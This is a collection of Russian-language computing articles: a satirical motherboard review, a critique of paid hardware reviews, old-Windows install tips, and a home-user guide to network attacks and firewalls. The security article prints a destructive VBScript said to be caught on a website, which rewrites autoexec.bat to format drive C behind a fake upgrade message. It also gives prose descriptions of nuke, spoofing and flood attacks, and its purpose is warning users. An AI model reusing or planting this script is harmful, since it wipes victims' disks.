Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

Смешно звучит, но это реклама или плагиат…

Пословица груба, да правда в ней люба!

Обзор материнской платы – Рахит РАСШИРЕННЫЙ ГЛЮК 7

А) Знакомство.

Комплектующие предоставлены фирмой “Рога и копыта computers”.

Сегодня мы поговорим об одной очень удачной, на мой взгляд, модели материнской платы – название которой РАХИТ РАСШИРЕННЫЙ ГЛЮК 7. К сожалению, она ещё не поступила в продажу у нас в стране. И её для обзора окружными путями доставили
из города Пекина, куда привезли морем со столицы острова Тайвань Тайбэя. А теперь давайте задумаемся, часто ли мы можем найти на рынке качественные и недорогие платы для процессоров фирмы 80286? Я думаю, нет. Тем более, вокруг столько фирм
желающих попросту надуть или развести пользователя. Не все фирмы продают такие качественные и недорогие материнские платы. Итак, давайте же рассмотрим новинку
этого сезона, материнскую плату РАХИТ РАСШИРЕННЫЙ ГЛЮК 7. И как говорится, разберём её по косточкам:

Кость первая:

Чипсет:такой крутой, что дальше некуда! Частота шины: 12/66
МГц
Установка частоты:Через BIOS, Гнездо процессора:квадратное
EISA: 2x/4х

Кость вторая:

Количество разъемов ISA:3 Количество разъемов SIMM: 4

Тип поддерживаемой памяти:SIMM 72, 96 pin.

Кость третья:
Максимальный объем оперативной памяти:3 Гб и 2 Гб.

Кость четвёртая:
Сеть: Глюкотех8100B; 10/100 Мбит/сек Поддержка ESDI (extended storage device interface 30 секторов на дорожку, 1000 марок в 1991 году):Да Поддержка (AT-BUS (IDE):Да Поддержка RLL (run length limited 26 секторов на дорожку, 937 кб в секунду):Да Поддержка MFM (modified frequency modulation 17 секторов на дорожку, 625
кб в секунду):Да Формат платы:AT, 30.5 х 24.4 см Jumperless: Да;

Кость пятая:
IDE -контроллер: High Point HPT374 (поддержка RAID 0, 1, 0+1), 4 канала, до 8 HDD.

Кость шестая:Порты:4 х USB 1.1, 3 х 1394a (на заднюю стенку выходят только 2 разъема, еще один в виде «header» на плате), Line-in, Center/Sub, Surround Spk, Front Spk , вход для
микрофона; Порты отсутствуют :PS/2, COM, LPT

Кость седьмая:
ADLIB SOUND CARD встроен, выходы Front, Rear, Center/Subwoofer, вход микрофона и линейный вход, а также проходной порт входа выхода для любопытных пользователей.

Кость – череп:
Конфигурация, с которой тестировалась материнская плата: 80286 + 640 kb ram Рахит GeEGA 256, НМЛ (накопитель на магнитной ленте), FDD5-25 MITSUMI, HDD 40MB Seagate st — 251 RLL
Операционные системы
Windows 3.0 professional и PTS DOS (лицензионное программное обеспечение
предоставлено фирмой “Ножи и топоры software”).

Б) Как оно работает.

Первое на что я всегда смотрю, так это на дизайн. Ведь первое впечатление должен
составлять именно он. Вы себе не представляете, дорогие читатели, какая всё же красивая материнская плата РАХИТ РАСШИРЕННЫЙ ГЛЮК 7! Разноцветные диоды, конденсаторы, резисторы – всё радует глаз. Они так великолепно раскрашены.
Дизайнеры РАХИТ отошли от традиционно синих конденсаторов, как в старых ПК, они сделали их чёрными. Что без сомнения сочетается с банками оперативной памяти. Не во всех фирмах создающих материнские платы думают об этом. Синяя наклейка РАХИТ на фоне двух микросхем очень радует глаз. Она так и говорит вам: “Жестянщик, ну
запусти какой-нибудь тест”. И вот после того как была запущена программа2D MARK, которая тестирует производительность процессора, памяти, жесткого диска и видео, выяснилось, что РАСШИРЕННЫЙ ГЛЮК 7 очень устойчивая в работе системная плата, а так же производительная. Вы можете сами наблюдать результаты. Но чтобы быть полностью объективными, мы решили так же использовать тесты «Затормози компьютер». Испытания этим программным пакетом показали так же неожиданно высокую производительность. Поскольку нас читают не слишком продвинутые пользователи, то я буду придерживаться простой стилистики написания. Самый главный плюс всё же не в тестах. Я ещё ни разу не видел, чтобы объём оперативной памяти в материнской плате мог
достигать 3 гигабайт. Тем не менее, это реально. Так что если вы будете покупать РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 в следующем месяце, когда её привезут на фирму «Рога и копыта computers», вы сможете, приобрети 3 гигабайта памяти со скидкой. Не мне вам
объяснять дорогие читатели, что от количества ОЗУ, так же зависит производительность системы. Так что если желаете играть в свои любимые игры, без тормозов не задумываясь, копите деньги на новый компьютер! Ведь если вы приобретете, ПК на базе процессора 80286 и материнской платы РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 в фирме «Рога и
копыта computers», вам со скидкой смогут подключить до 12 жёстких дисков. Что даст возможность хранить любимые фильмы и музыку у себя в компьютере. Как вам такая
перспектива? Но не будем отвлекаться. Плата РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 имеет встроенную звуковую и сетевую карту, а так же модем. Мне как пользователю было
очень приятно проинсталлировать драйвера к этим устройствам сразу же автозапуском с дискеты. Ещё никогда установка нового оборудования не была такой простой. Это ещё одно из преимуществ РАХИТ. Отдельной строкой следует остановиться на сетевом адаптере Глюкотех8100B. Он работает со скоростью 10 мегабит. Его работа составляет наилучшее впечатление. Обычные сетевые карты очень тяжело настраиваются в системе. И поэтому лучше иметь встроенное устройство. Ведь, нам не нужно будет выставлять
прерывания, так как конфликтов с таким оборудованием не возникает. Материнская плата РАХИТ принесла смерть устаревшим портам PS/2, COM, LPT. Все они больше не поддерживаются, а следовательно и не установлены. В РАСШИРЕННЫЙ ГЛЮК 7 встроены современные многофункциональные порты USB. Ведь и в самом деле
прогресс не остановишь! Поле того, как материнская плата была протестирована у меня в ЛАМО — лаборатории (лаборатория аппаратного моделирования оборудования), я отдал её на тест к знакомым знатокам — профессионалам. Как всегда, для того чтобы выставить оценки по десятибалльной системе. Итак, средний бал, который получился после тестов, составил — 9,8 литра. Это, несомненно, выше, чем когда мы представляли другие платы.
Добавлю лишь одно, что в выставлении оценок участвовало одиннадцать человек и двенадцать с лишним литров пива.
Чудной Жестянщик.
Железяка для обзора предоставлена фирмой: «Рога и копыта computers».

Ну, а если серьёзно?

Компьютерные издания частенько пестрят статьями вида «обзор материнской платы»
или «видео карта такая». И зачастую их бывает так много, что в номере они чуть ли не наслаиваются одна на одну. Да и по размерам своим они обычно не менее одной печатной
страницы. И вот когда открываешь такой обзор, невольно задаёшься вопросом. Каким? А могут ли одни и те же люди без отдыха описывать комплектующие? Да не просто описывать, нужно сказать правильно — тестировать. Ответ могут. Вопрос в другом. Как можно прогнать за неделю по пять комплектов оборудования? Так мало того чтобы
всё это протестировать, так ещё и написать про это. Кто-то скажет, что это возможно без проблем. Но смею вас заверить, что очень квалифицированные люди из многих компьютерных фирм заверяли, что они тестируют комплекты оборудования в
течении 24 часов. Или мне очень удачные фирмы попадаются, или кто-то врёт? Причём не редко появляются слухи про то, что многие авторы просто неквалифицированны в опросах обзоров. Скажем некоторые «писаки» условной газеты «Калифорнийская
правда» только в этом году окончили школу. Но зато они уже на всех форумах гордо именуют себя «компьютерный обозреватель». Должен добавить, что с одним таким автором удалось пообщаться, на одном из бескрайних форумов белорусского интернет.
Довольно забавно было поговорить с ним про основы полупроводниковой физики. В принципе я, как и мои знакомые не хотели кого-то обидеть, нам просто было интересно узнать уровень этого автора. И каково было наше удивление, когда толком нам даже не ответили про P-N-P переход. Вы спросите причём здесь это? Просто иногда читая обзоры, замечаешь такие казусы, что хочется написать: «Не умеешь — не пиши»! Но писать
будут, потому как одна тысяча символов это 1$. И если автор в течении месяца наклепает, да именно наклепает, четыре публикации с суммарным числом символов в сорок тысяч, то он получит 40$. При этом оборудование для тестов тоже само по себе не возникает. В
компьютерной фирме тоже приплатят, чтобы появилась надпись вида: «железо предоставлено фирмой рога и копыта computers». Вот и выходит, что многое пишется не ради какой-то идеи, а ради денег. К слову сказать, я уверен на все 100%, что не одна из
белорусских газет не взялась бы напечатать этот материал. Почему? Надеюсь, вы поняли. В течении полугода я печатался в одной газете условное название которой будет
«Медицинский ЭВМ». В то время мне пришлось получить довольно занимательное предложение от условной фирмы X. Где за определённые коврижки предлагалось произвести обзор некоторого количества материнских плат. На мой наивный вопрос:
«А где я это всё тестировать буду?» Я получил наивный ответ: «Так, мы тебе результаты тестов дадим, а ты это только литературно оформишь! Так все делают!» С тех пор моя
искренняя вера в обзоры погасла. Но на этот раз я желаю задать вопрос вам, дорогие читатели. Пусть каждый ответит для себя сам. Как можно считать тест объективным, если не указана не ОС под которую он проводился, а так же для сравнения не приведены аналоги оборудования? Отцы компьютерных тестов знают, о том что результаты для Win XP и ME могут расходится до 20%. Или что после трёх и более часов работы разогнанная
машина может попросту начать вешаться. Но дело не в этом. Читая многие материалы, складывается интересное впечатление о стиле авторов. Ради интереса я решил взять обзор одной материнской платы ABIT AT7 и проверить, плагиат или нет? Каково было моё удивление, когда я обнаружил, что аналогичный материал вышедший на сайте www.techzone.com за четыре месяца до публикации в условном издании «Калифорнийская
правда.» К сожалению, материал был на английском языке. Но, боже мой, какое сходство! Всё от стиля написания до результатов тестов и среднего бала. К сожалению, во избежание различных юридических проблем конкретно ничего не называется. Но могу искренне вас заверить, что события по которым создана эта публикация основаны на
реальных фактах. Но вот любое совпадение имён и названий является вымышленным, а сходство случайным. Правда или вымысел это судить вам. Единственное, что я могу
сказать. Читайте журналы! Там редко появляются публикации одного автора, об одной запчасти. А если и бывают, то не об одной, а как минимум о трёх.

Роман Карпач

Назад в будущее.

Случается часто так, что для некоторых целей необходимо запустить на компьютере старые версии WINDOWS. Будь то в целях программирования или просто ностальгии. Да и повысить производительность своего не очень быстрого компьютера с помощью старых программ тоже хочется. Сегодня я расскажу про установку WINDOWS 95 на компьютеры с процессором AMD выше 350 мегагерц, а так же о работе WINDOWS 3.X на компьютерах с файловой системой FAT 32.
WINDOWS 95.
Всем известно про то, что WINDOWS 95 устанавливается на компьютеры с процессором не выше 350 Mhz. Хотя поддержка этой версии прекратилась несколько лет назад, работать с ней продолжают во многих местах. И вот однажды я задался риторическим вопросом. Как установить WINDOWS 95 на компьютер с процессором AMD 450? Ведь он выше, чем максимально поддерживаемый системой. Откровенно говоря, я просто надеялся поднять производительность “ПК” установив относительно старое программное обеспечение. И это действительно удалось благодаря патчу, который можно скачать вот по этому адресу: http://www.windrivers.com/company/amd/k6-2up.zip. Сразу оговорюсь, что он распространяет своё действие на компьютеры с CPU AMD K6-2. Всем же владельцам INTEL и CYRIX предлагаю поискать свою версию. Перед тем как начать описание инсталляции всегда следует рассказать о “подводных камнях”. Первый такой валун, на который я напоролся в процессе работы, заключался в невозможности обновления WINDOWS 95 из среды MS DOS. Ведь, проблема состоит в том, что при запуске инсталляции через некоторое время возникает ошибка. Это приводит к невозможности дальнейшей установки системы. К слову сказать, на период инсталляции WINDOWS 95 мне пришлось переставить в BIOS моей материнской платы TX 100 частоту процессора с 450 до 350 Mhz. Это дало возможность установить систему, запустить патч уже из среды WINDOWS. Затем осталось зайти в BIOS и выставить настройки назад. Всё проблема решена. И WINDOWS 95 может спокойно “летать” на вашем компьютере. Единственное о чём осталось предупредить, так это работе драйверов. Ставьте версии адаптированные для WINDOWS 95. Это устранит проблемы “зависания” и перезагрузки системы.
WINDOWS 3.X
Старые добрые окошки. Ещё не ОС, но уже оболочка. То с чего началось победоносное шествие WINDOWS. Да, ну ладно. Перейдём сразу к делу. Проблем 3.X для современных компьютеров состоит в том, что она не может установиться на файловую систему FAT 32. При такой попытке выдаётся сообщения о невозможности запуска программы и предложение нажать три заветные клавиши, дабы перезагрузить компьютер. Для решения этой проблемы существует одна маленькая программа. Скачать эту утилиту можно с моего сайта : www.fdd5-25.narod.ru/drivers/Osr2kit.exe . Запускаете её из режима MS DOS, перезагружаете компьютер. После чего смело устанавливайте любую версию 3.X.

Роман Карпач

Защити себя сам!!!

На войне как на войне…
***
Перед началом просмотра публикации настоятельно рекомендую начинающим пользователям прочесть словарь терминов:
DNS (Domain Name System — система имен доменов) Распределенный механизм имен/адресов, используемых в сети Internet. Используется для
разрешения логических имен в IP-адреса. DNS используется в сети Internet, обеспечивая возможность работы с понятными и легко
запоминающимися именами вместо неудобоваримых чисел IP-адреса.
Domain (домен) В сети Internet часть иерархии имен. Синтаксически доменное имя Internet содержит последовательность имен (меток), разделенных точками (.) например, «fdd5-25.narod.ru» В OSI термин домен используется как административное деление сложных распределенных систем, как в MHS Private Management Domain (PRMD) и
Directory Management Domain (DMD).
ICMP: Internet Control Message Protocol. Протокол, используемый для
контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP.
TCP: Transmission Control Protocol. Основной транспортный протокол в наборе протоколов Internet, обеспечивающий надежные, ориентированные на соединения, полнодуплексные потоки.
TCP/IP (Transmission Control Protocol/Internet Protocol — протокол управления передачей/протокол Internet) Известен также как стек протоколов Internet (Internet Protocol Suite). Данный стек протоколов используется в семействе сетей Internet и для объединения гетерогенных сетей.
Ping: Packet internet groper. Программа, используемая для проверки доступности адресата путем передачи ему специального сигнала (ICMP echo request — запрос отклика ICMP) и ожидания ответа. Термин используется как глагол: «Ping host X to see if it is up!»
Port (порт) Абстракция, используемая транспортными протоколами Internet для обозначения многочисленных одновременных соединений с единственным хостом — адресатом. Физический интерфейс компьютера, мультиплексора и т.п. для подключения терминала или модема.
FTP: File Transfer Protocol. Используемый в Internet протокол (и программа) передачи файлов между хост — компьютерами.
Telnet Протокол виртуального терминала в наборе протоколов Internet. Позволяет пользователям одного хоста подключаться к
другому удаленному хосту и работать с ним как через обычный терминал.
UDP (User Datagram Protocol) Прозрачный протокол в группе протоколов Internet. UDP, подобно TCP, использует IP для доставки; однако, в отличие от TCP, UDP обеспечивает обмен дейтаграммами без
подтверждения гарантий доставки.
***
Каждый пользователь проводящий в интернете много времени может стать потенциальной жертвой сетевой атаки. В чём она может выражаться? Да в чём угодно, от доступа к ресурсам вашего компьютера, до банального отсоединения от провайдера. Причём, в последние время подобные случаи участились на столько, что настал момент когда об этом нужно написать. Я не хочу начинать публикацию с пустого описания программ для защиты в интернет. Ведь программы пишутся под конкретную проблему. И наверное, просто следует написать про то, что и как может вызвать поражение пользователя или сервера в сети. Первое на чём бы я хотел заострить ваше внимание, так это на довольно необычной угрозе для ваших жёстких дисков. Это вредоносные скрипты, которые могут находится на любом сайте.

script language ="VBScript"
sub Reboot
Set
Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe
User.exe,ExitWindows"
RunDll
end sub
sub
destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if
fs.fileexists("c:\autoexec.bat") then
set
ab=fs.getfile("c:\autoexec.bat")
ab.attributes=0
end if
set
autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine
"@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close
end sub
destruct
format
reboot

Только видимо неудачный, поскольку мне удалось его выловить с одной занимательной страницы. На которой-то он и лежал, дабы отформатировать мой жёсткий диск. Но к счастью выдал, что у него ошибка в третьей строке. Однажды даже попался немного другой экземпляр, который вписывал себя в автозагрузку WINDOWS и вешал компьютер намертво. Поэтому прошу, не повторяйте моей ошибки посещая сомнительные сайты предложенные вам в чате или в очередном спаме. Развивая тему нельзя не затронуть возможные методы обнаружения злоумышленником вашего компьютера в сети интернет. Пока вы думаете читать ли это дальше, хочу поведать одну жизненную историю. Есть у меня знакомый администратор компьютерного клуба. Где есть выделенный канал. И вот долгими ночами вместо того как играть со всеми в COUNTER STRIKE, он сидит с программой «IP сканер» и ищет пользователей которые на данный момент в сети. Потом уже с помощью другой утилиты сканирует порты. Ports scan. Сканирование компьютерной системы на наличие портов, путем попыток их открытия. Эта атака сильно расходует ресурсы системы. Обычно она используется для поиска слабых мест <дырок> в «ПО», «ОС» компьютера и предшествует более элегантной атаке. К чему я всё это рассказываю? Поймёте прочитав всё ниженаписанное. Любимое оружие всех сетевых сумасбродов это Win Nuke. Hаpяду с обычными данными пересылаемыми по TCP соединению
стандарт предусматривает также передачу срочных (Out Of Band)
данных. У большинства PC с установленным Windows присутствует сетевой протокол Net BIOS, который использует для своих нужд 3 IP порта: 137, 138, 139. Как выяснилось, если соединиться с Windows машиной в 139 порт и послать туда несколько байт Out Of Band данных, то NetBIOS не зная что делать с этими данными попросту подвешивает или перезагружает машину. Для Windows 95 это обычно выглядит как синий текстовый экpан, сообщающий об ошибке в драйвере TCP/IP и невозможность работы с сетью до перезагрузки ОC. NT 4.0 без сервис паков перезагружается, NT 4.0 со вторым сервис паком выпадает в синий экран. Что же касается WINDOWS 98 SE (пропатченная версия). Думаю, стоит быть спокойным. Проведя тест у себя в локальной сети (12 компьютеров), я выяснил, что не один из 18 нюкеров не произвёл никакого воздействия на машины. Хотя не исключено, что старая дыра давно используется в новых, ещё более коварных целях. Чаще всего жертвой NUKE атаки можно стать в обычном web чате. Конечно, нельзя обойти вниманием и другой тип нюков — ICMP: Internet Control Message Protocol. Протокол, используемый для контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP. Суть атаки такая же как и у стандартного NUKE. На компьютер жертвы высылается сообщения об ошибках и компьютер виснет намертво. Что же касается чатов — IRC. Puke. Осуществляется посылка злоумышленником атакуемому хосту пакета ICMP unreachable error (неизвестная ошибка удаленной системы), что в свою очередь вызывает отключение Хоста от сервера (обычно IRC). Сейчас шла речь, на мой взгляд, о более распространённых методах атак на обычного пользователя. Но не стоит упускать из виду и атаки на сервера. Ведь от стабильности оных может зависеть работа сотен людей!
Угроза для серверов это и угроза пользователям.
Есть такая вещь Dummy ARP server. В сети Internet каждый пользователь имеет уникальный IP адрес, на который поступают все сообщения из глобальной сети. Однако протокол IP это не столько сетевой, сколько межсетевой протокол обмена, предназначенный для связи между объектами в глобальной сети. На канальном уровне пакеты адресуются по аппаратным адресам сетевых карт. В сети Internet для взаимно однозначного соответствия IP и Ethernet адресов используется Address Resolution Protocol. Первоначально хост может не иметь информации о Ethernet — адресах других пользователей, находящихся с ним в одном сегменте, в том числе и о Ethernet — адресе маршрутизатора. Соответственно, при первом обращении к сетевым ресурсам хост отправляет широковещательный ARP-запрос, который получат все станции в данном сегменте сети. Получив данный запрос, маршрутизатор отправляет на запросивший хост ARP-ответ, в котором сообщает свой Ethernet-адрес. Данная схема работы позволяет злоумышленнику послать ложный ARP-ответ, в котором объявить себя искомым хостом, (например, маршрутизатором), и, в дальнейшем, активно контролировать весь сетевой трафик «обманутого» хоста. Проще говоря получать все ваши данные. Но это ещё не всё, что может приключиться с нами, пока мы спим.
Dummy DNS. Внедрение в сеть Internet ложного DNS-сервера путем перехвата DNS-запроса. Для реализации атаки злоумышленнику необходимо перехватить DNS-запрос, извлечь из него номер UDP-порта отправителя запроса, двухбайтовое значение ID идентификатора DNS-запроса и искомое имя и, затем, послать ложный DNS-ответ на извлеченный из DNS-запроса UDP-порт, в котором указать в качестве искомого IP-адреса настоящий IP-адрес ложного DNS-сервера. Это позволит в дальнейшем полностью перехватить и активно воздействовать на информацию, циркулирующую между «обманутым» хостом и сервером. Необходимым условием осуществления данного варианта атаки является перехват DNS-запроса. Это возможно только в том случае, если атакующий находится либо на пути основного трафика, либо в сегменте настоящего DNS-сервера. Выполнение одного из этих условий местонахождения хакера в сети делает подобную удаленную атаку трудно осуществимой на практике (попасть в сегмент DNS-сервера и тем более в межсегментный канал связи атакующему скорее всего не удастся). Однако в случае выполнения этих условий возможно осуществить межсегментную удаленную атаку на сеть Internet, что вообще-то нежелательно.
IP Hijacking. Необходимым условием является доступ к машине, находящейся на пути сетевого потока. Напомним, что при передаче данных постоянно используются оба поля находящиеся в IP-заголовке. Исходя из их значения, сервер и клиент проверяют корректность передачи пакетов. Существует возможность ввести соединение в «десинхронизированное состояние». Это когда присылаемые сервером данные не будут совпадать с ожидаемым значениями клиента, и наоборот. В данном случае злоумышленник, «прослушивая» линию, может взять на себя функции посредника, генерируя корректные пакеты для клиента и сервера и перехватывая их ответы. Метод позволяет полностью обойти такие системы защиты, как, например, одноразовые пароли, поскольку злоумышленник начинает работу уже после того, как произойдет авторизация пользователя. UDP storm. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 («эхо», полученный пакет отсылается назад), 19 («знакогенератор», в ответ на полученный пакет отправителю высылается строка знакогенератора) и других. В данном случае хакер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя — 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19 и так до бесконечности. Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Traffic analysis (sniffing) Прослушивание канала. Практически все сетевые карты поддерживают возможность перехвата пакетов, передаваемых по общему каналу локальной сети. При этом рабочая станция может принимать пакеты, адресованные другим компьютерам того же сегмента сети. Таким образом, весь информационный обмен в сегменте сети становится доступным хакеру, что поможет в дальнейшем ему подобрать/придумать другие типы атак против Вас. Для успешной реализации этой атаки компьютер злоумышленника должен располагаться в том же сегменте локальной сети, что и атакуемый компьютер. Атака Brute Force «Грубая сила», используется хакерами в тех случаях, когда доступ к системе либо информации закрыт паролем, а уязвимостей не удалось обнаружить. Осуществляется простым перебором всех возможных либо наиболее часто встречающихся паролей. Во втором случае brute force достаточно часто называют «атакой по словарю». Fuzzy. Пакет IP содержит поле, определяющее какой протокол следующего уровня(TCP, UDP, ICMP) использует данные из Internet. Хакеры могут использовать нестандартное значение данного поля для передачи данных, которые не будут фиксироваться стандартными средствами контроля информационных потоков.
Denial of service (DOS)
Класс атак, приводящих к отказу в обслуживании. Во время таких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности связи, что может привести к сильному замедлению работы всей компьютерной системы, отдельных задач, либо вообще к полной остановке пользователя. К DOS атакам относятся Floods, ICMP flooding, Identification flooding и другие. Изначально оговорюсь, что многое нижеописанное истинно для серверов.
1. Floods. Перевод с английского на русский — «затопление». Во время floods атак происходит посылка большого количества на атакуемую систему ICMP (чаще всего) либо UDP пакетов, которые не несут полезной информации (мусор). В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших бесполезных пакетов и генерацией на них ответов.
2. SYN flooding. Затопление SYN-пакетами — самый известный способ «забить» информационный канал. Затопление SYN пакетами основано на переполнении очереди сервера, после чего сервер перестает отвечать на запросы пользователей. В различных системах работа с очередью реализована по разному. После истечения некоторого времени (зависит от реализации) система удаляет запросы из очереди. Однако ничего не мешает хакеру послать новую порцию запросов. Таким образом, даже находясь на соединение 2400 bps, злоумышленник может посылать каждые полторы минуты по 20-30 пакетов на сервер, поддерживая его в нерабочем состоянии. Атака обычно направлена на определённую, конкретную службу, например telnet или ftp. Она заключается в передаче пакетов установления соединения на порт, соответствующий атакуемой службе. При получении запроса система выделяет ресурсы для нового соединения, после чего пытается ответить на запрос (послать «SYN-ACK») по недоступному адресу. По умолчанию NT версий 3.5-4.0 будет пытаться повторить подтверждение 5 раз — через 3, 6, 12, 24 и 48 секунд. После этого еще 96 секунд система может ожидать ответ, и только после этого освободит ресурсы, выделенные для будущего соединения. Общее время занятости ресурсов — 189 секунд.
3. ICMP flooding (flood ping). Перевод с английского на русский — «поток пингов». Во время этой атаки происходит посылка компьютерной системе жертвы большого количества запросов ICMP. В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших пакетов и генерацией на них ответов. Примечание: В мирных целях пинг используется администраторами и пользователями для проверки работоспособности основных частей транспортной системы вычислительной сети, оценить работу сети при максимальной нагрузке. При стандартном режиме работы пакеты высылаются через некоторые промежутки времени, практически не нагружая сеть.
4. DNS flooding, DNS scan. Эта атака, направленная на сервера имён Internet. Она заключается в передаче большого числа DNS запросов и приводит к тому, что у пользователей нет возможности обращаться к сервису имен и,
следовательно, обеспечивается невозможность работы обычных пользователей. DNS scan. Известно, что прежде чем начинать атаку, хакеры осуществляют выявление целей, т.е. выявление компьютеров, которые будут жертвами атаки, а также компьютеров, которые осуществляют информационный обмен с жертвами. Одним из способов выявления целей заключается в опросе сервера имён и получение от него всей имеющейся информации о домене.
5. Unreachable (dest_unreach, ICMP type 3). Эта атака заключается в том, что компьютерной системе посылается сообщение ICMP type 3, которое сообщает, что порт назначения недоступен тем самым обманывая систему и вынуждая ее разорвать соединение т.к. она будет «думать» что пакеты не доходят. ICMP туре 3 может посылаться клиентской машине, которая затем произведет отключение, либо посылаться серверу и инициатором отключения станет он. Посылку ICMP туре 3 осуществляет хакер.
6. UDP bomb. Передаваемый пакет UDP содержит неправильный формат служебных полей. Некоторые старые версии сетевого ПО приводят при получении подобного пакета к аварийному завершению системы.
7.Smurf. Атака заключается в передаче в сеть широковещательных ICMP запросов от имени компьютера-жертвы. В результате компьютеры, принявшие такие широковещательные пакеты, отвечают компьютеру-жертве, что приводит к существенному снижение пропускной способности канала связи и, в ряде случаев, к полной изоляции атакуемой сети. Атака smurf исключительно эффективна и широко распространена.
8. Pong Floods — атаки, перечисленные выше, но в качестве обратного действительного IP-адреса отправителя используется поддельный. Тем сам затрудняется обнаружение хакера.
Конечно, тяжело решить проблему безопасности в сети. Но можно попробовать. Я хочу рассказать про то, как может себя защитить обычный пользователь. Ведь по статистике именно его компьютер чаще всего становиться жертвой. Для обороны нашего с вами здоровья, давно разработаны средства «индивидуальной защиты». К ним относятся программы FIREWALL (огненная стена). FIREWALL-ы бывают разными, как для домашнего пользования (TINY PERSONAL FIREWALL, BLACK ICE), так и для корпоративного. Предприятия сами разберутся, что им делать. А вот обычный неискушённый пользователь не всегда. Хочу предложить вашему вниманию на мой взгляд самых удачных представителей «огненных стен» . Все они были мною испытаны в разное время, в разных частях интернет. Outpost Firewall (www.agnitum.com) — стал классикой пару лет назад. С тех пор не теряет своих позиций на рынке. Был создан специально для новичков, не требуя много времени на изучение своих настроек и возможностей. В то же время продвинутые пользователи нашли в программе много полезных возможностей, что позволяет создать изощренные настройки для защиты своего компьютера или сети. Уровень Outpost Firewall был высоко оценен крупнейшими отечественными изданиями, такими как «Компьютер-Пресс», «Софтерра», «Хакер», «Компьютерная Газета». Но в бочке мёда нельзя не обойтись ложкой дёгтя. В процессе работы было замечено, что компьютеры на базе процессоров AMD 450, 1600 XP под управлением системы WINDOWS 98 SE частенько после использования этой программы вешались при выключении компьютера. Конечно, я не настаиваю на все 100%, что это вызывает FIREWALL, но такие проблемы случались очень часто. И это наводит на некоторые размышления. Тем не менее это не помешало программе защитить меня пару раз в чате от NUKE атаки. Её пытались провести на компьютер. Кстати, второй эпизод знакомства с Outpost случился намного позже ещё в одном чате. На сей раз FIREWALL выдал, что был запущен ICMP фраг. В обеих случаях мой компьютер не пострадал. Это и является самой лучшей характеристикой программы. Второй продукт, который считается одним из лидеров в своей области называется Norton Personal Firewall или ещё одна его разновидность Norton Internet Security (www.symantec.com).
Norton Internet Security специально предназначена для защиты вас и вашей семьи от опасностей которые подстерегают в Internet. Основные его возможности : Закрывает доступ в Internet детям, автоматически преграждает путь вирусам и другому вредному коду. Что очень удачно подходит для борьбы со скриптовыми вирусами, описанными чуть выше. Защищает ваш компьютер как от атак из вне, так и от программ троянов, которые могут попытаться вырваться в сеть с украденной информацией.
Вообще-то программ подобного рода очень и очень много. И для описания хотя бы десятка их потребовалась не одна журнальная страница. Именно по этому в окончании публикации я хочу привести отрывок одного текста (переведённого с английского), который был написан для программы Black Ice (FIREWALL) ещё в 1999 году.
«Большинство хакеров являются неопытными детьми желающими пошутить. Они просто хотят порисоваться перед своими друзьями, что они могут взломать систему. К несчастью, даже неопытный взломщик может вызвать серьезный ущерб войдя в вашу сеть. Корпорации давно узнали о рисках для их бизнеса вызванного хакерами. Тем не менее, большинство министерств внутренних дел и пользователей — не подозревают, что хакеры могут сделать. Они могут сделать ваш компьютерный полностью непригодным к работе. Хакеры могут украсть или удалить важные данные. Находчивый взломщик может вызвать огромный финансовый ущерб, компаниям которые каждый, используют Internet. В 1997 комиссия Сената США, Роберта S. Litt, Deputy (ассистента Министра Юстиции) установила. Компьютерные преступление обходятся от $500 миллионов до $10 миллиардов долларов за год. Институт компьютерной безопасности опросил 428 специалистов информационной безопасности в компаниях. 42% респондентов указало, что происходило несанкционированное использование их компьютерных систем в течение прошлого года. И всё из-за отсутствия централизованного управления или недостаточного финансирования.» Напомню ещё раз, что такая ситуация была в 1997 году. С тех пор многое изменилось. Но одна вещь осталось незыблемой. На безопасности экономить нельзя!

При создании публикации были использованы материалы с сайта
http://kiev-security.org.ua

Роман Карпач

Пока гром не грянет, мужик не перекрестится.

(начинающему пользователю посвящается)
Уж сколько раз твердили пользователям во всём мире, что следует пользоваться антивирусными программами. Но многие так никогда и не делают этого. А зря. Ведь никто не застрахован от попадания в компьютер разнообразных вредоносных программ. Из своего опыта добавлю, что самая уязвимая прослойка пользователей это секретари и бухгалтеры, которые по простоте душевной или по незнанию не обновляют свои антивирусы. А бывает, так что даже и не пользуются ими. На написание этой статьи меня подбил целый ряд жизненных ситуаций. Когда у многих пропадала важная информация с компьютеров и огромные базы данных. И всего лишь потому, что захотелось не весть откуда принести дискету с заражённой WINCIH Масяней. А ведь подобные случаи не единичны! И поэтому заражение древним вирусом “Чернобыль” продолжается повсеместно, хотя его обнаружит любой современный антивирусный пакет.
Вирусы как вид программ.
У каждого человека, который пользуется компьютером, наверняка, есть свой первый вирус. Для меня это была незабвенная вещица под названием ”Миссис Пакман”. А для вас? Напрягите память! Проблем, к слову сказать, она принесла много. Но за то в те далёкие 90-е многие поняли, что с вирусами шутки плохи. Само же понятие «компьютерный вирус» впервые употребил сотрудник Лехайского университета (США)
